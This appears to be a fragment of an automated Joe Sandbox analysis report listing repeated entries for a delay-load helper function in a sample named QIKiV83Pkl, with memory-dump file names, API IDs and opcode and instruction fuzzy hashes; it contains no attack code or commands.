                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 68433bc506b514d1121dca80827680341e8814268aa0001fe8d14d58b6151ea6
                • Instruction ID: 663c8094a4cc19648d21aa7fd124a57a6ee2de7c3a843b853a6f482a4aa443ac
                • Opcode Fuzzy Hash: 68433bc506b514d1121dca80827680341e8814268aa0001fe8d14d58b6151ea6
                • Instruction Fuzzy Hash: C6B012A126C202BC310C7159AC02D36031CF4C2B10330852BB30DD02C1D8406C091632
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 3d106dc00be9e371e0a93a76267b2e88e59c20c0e890505e0dff3855ef1e45c3
                • Instruction ID: 9cab3c57fb5b7d61b7cb142c56f708fe1027e7551cddcf4ea0eca6b573d67214
                • Opcode Fuzzy Hash: 3d106dc00be9e371e0a93a76267b2e88e59c20c0e890505e0dff3855ef1e45c3
                • Instruction Fuzzy Hash: 67B012A126C201BC310C71586D02D36031CF4C2B10330852BB30DD02C1D8406D0A1632
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088E20B
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: c560872c7edf590cef703e8ecd74d25a777b394c4dbb20c8b9edcc87d35c21f3
                • Instruction ID: 034316f2781358b9eebfe81b1eb1ed0e7e08fe60a9da9421b77a82ecb9722ce3
                • Opcode Fuzzy Hash: c560872c7edf590cef703e8ecd74d25a777b394c4dbb20c8b9edcc87d35c21f3
                • Instruction Fuzzy Hash: 9BB012A126E1017C320C3146BD06C3A032CF4C0B51330811FB315D41C19B404C299133
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 84a4aeee8a1c363e2091fa2ac740f156951b2990d5bf54aabc1082a16412eeb1
                • Instruction ID: ae4ae053c6fef5dd67206048a710bea5157a3ee8f3f24b207303595fa3f015ae
                • Opcode Fuzzy Hash: 84a4aeee8a1c363e2091fa2ac740f156951b2990d5bf54aabc1082a16412eeb1
                • Instruction Fuzzy Hash: 3CB012A126D2017C310871586C02D3A031DF4C3B10330C52BB709D02C1D840AC081632
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: b26af0c5bba138eb69b563f41a8dbb5ccf3fe75665c3ac4a92bcee5cc979c6ce
                • Instruction ID: 2622381fb06459c59cb4cf848ecfe2149508338f405b80e042da805a7445b7cd
                • Opcode Fuzzy Hash: b26af0c5bba138eb69b563f41a8dbb5ccf3fe75665c3ac4a92bcee5cc979c6ce
                • Instruction Fuzzy Hash: 8EB012B126D3017C314872986C02D3A031DF4C2B10330862BB309D02C1D840AC481632
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: dcec92a98408c1a33efaaea77caabfd0c33fc46eff7850ce5e9f6c4ae6ef6520
                • Instruction ID: 6b75806b4645adb76c962f532bbc8fb2763a5cb33cba1c9c9bc1b63ea76d3eaf
                • Opcode Fuzzy Hash: dcec92a98408c1a33efaaea77caabfd0c33fc46eff7850ce5e9f6c4ae6ef6520
                • Instruction Fuzzy Hash: 44B012912AC2017C310871686C03D36035CF8C3B10330C52BB709D02C1E9406C081632
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 7d2126f2fefd106f653b62ffbd26c543cf358f380465786db5dfeba3af09982e
                • Instruction ID: 158913c71d2be167a64505ed274f3574abdf0bb9870288ad1938038d4c7d163a
                • Opcode Fuzzy Hash: 7d2126f2fefd106f653b62ffbd26c543cf358f380465786db5dfeba3af09982e
                • Instruction Fuzzy Hash: B0B012A127D2027C310871586C02D3A035DF8C2B10330852BB309D02C1D840AC081632
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088D8A3
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 50b5ba59ec471cdaf2f06f16e1a836635b3427dd94ca28e68bb890838fc1d64c
                • Instruction ID: 352571dfc779a5b7b8d56b80a01a4fb7a5bb6b0bc690b039787ba8b0e25b8f3f
                • Opcode Fuzzy Hash: 50b5ba59ec471cdaf2f06f16e1a836635b3427dd94ca28e68bb890838fc1d64c
                • Instruction Fuzzy Hash: 03B012A12AC2017C310C71586D03D36039CF8C3B10330852BB309D02C1E8406C091632
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 5fe760a3cd7293b6b77ee49abbfa991347939b7ccf0b6841f9acd4edc2759f2a
                • Instruction ID: 8256c4b2454b0c94b431f825bfefafe3547228e8ce36e7e6ffbd1a12c1853099
                • Opcode Fuzzy Hash: 5fe760a3cd7293b6b77ee49abbfa991347939b7ccf0b6841f9acd4edc2759f2a
                • Instruction Fuzzy Hash: 89B012A126C201AC320C714A6D02D3A035CF0C0B50330C21BB509C02C5E8484C095632
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: c56a39590e194024fbbf2fc64f8c036db84114ebad626934d68868f64b298c54
                • Instruction ID: fb6d4dd5d6cb830a715e0650d7febfaa2d7b69230a91c41f50fb72bc13fed8ab
                • Opcode Fuzzy Hash: c56a39590e194024fbbf2fc64f8c036db84114ebad626934d68868f64b298c54
                • Instruction Fuzzy Hash: 24B0129126C2016C310C714E6D02E3E035CF0C4B50330C61BB209C02C9E8444C0D5632
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DBD5
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 74bee080460cde56825c183f89f4c7811e225567bd98c049d257bc0f4130f0b0
                • Instruction ID: 51878abf8f8e9116da075f8076a1a2820c8a43f24e1e0a900ce182479bb72b21
                • Opcode Fuzzy Hash: 74bee080460cde56825c183f89f4c7811e225567bd98c049d257bc0f4130f0b0
                • Instruction Fuzzy Hash: 0AB0129537C30A7C320831442C07C37036CF0C0B30330462BB206D01C19D404C4D5132
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DBD5
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 30cf2b81847b2fe475e67f9cfe2db5aac8938503364dfd2f40bd4beb80286e52
                • Instruction ID: 6c056c254a8be7851559b21809fe842cb1261c052e96b11988d98da371497651
                • Opcode Fuzzy Hash: 30cf2b81847b2fe475e67f9cfe2db5aac8938503364dfd2f40bd4beb80286e52
                • Instruction Fuzzy Hash: 21B0129936C2056C310871582C07E36036CF0C0B30330852BB21BC06C1DD404C0D5232
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DBD5
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: f2da371c4ee5e3ff75708be90a5594fe1c8a5797dba98b82cddba48f2eb3e198
                • Instruction ID: 29deb2b13204bea4458d46b0805560d58b17df39778986d471612420faa12299
                • Opcode Fuzzy Hash: f2da371c4ee5e3ff75708be90a5594fe1c8a5797dba98b82cddba48f2eb3e198
                • Instruction Fuzzy Hash: EFB0129536C206AC320C71482C07D3703BCF0C0B30330851BB60AC12C1DD404C0D5232
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DBD5
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: fdb6bee80e1e40b297903b028a417f51bd19ccee04eae0fe4315531eb2573d03
                • Instruction ID: 67b955d00bea919888b130a1f2cc93a8af01f65f69aeafbf3b640004c27a95ef
                • Opcode Fuzzy Hash: fdb6bee80e1e40b297903b028a417f51bd19ccee04eae0fe4315531eb2573d03
                • Instruction Fuzzy Hash: 38B0129536C2466C310C71482D07D3703ACF0C4B30330851BB30AC02C1DD414C0A5232
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DAB2
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 4e35ea49122bdc60102c3f135a589cdcd2eaa877a3e82b6edb4817bdce509a7b
                • Instruction ID: d76a15f095d3b6406c648f29f0f7939b030fb8a9a3db8adf43eb63edb5316a91
                • Opcode Fuzzy Hash: 4e35ea49122bdc60102c3f135a589cdcd2eaa877a3e82b6edb4817bdce509a7b
                • Instruction Fuzzy Hash: FCB012912AC3056D310CB14A6D02E3A035CF0C1B51330821BB109C02C5E8444C085732
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DC36
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 16db880624e8d2bc3d7bdf49afea95bf906f50f5719aab453dea71123bb050fa
                • Instruction ID: 16fba84ade1992b19a93cdb981cb2e85c0d67152f927f003f81f822025358c37
                • Opcode Fuzzy Hash: 16db880624e8d2bc3d7bdf49afea95bf906f50f5719aab453dea71123bb050fa
                • Instruction Fuzzy Hash: AEB0129526C305FC310C31446E12C36033DF2C0B11330871BF309E12C1A9807C486132
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 0088DC36
                  • Part of subcall function 0088DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088DFD6
                  • Part of subcall function 0088DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088DFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
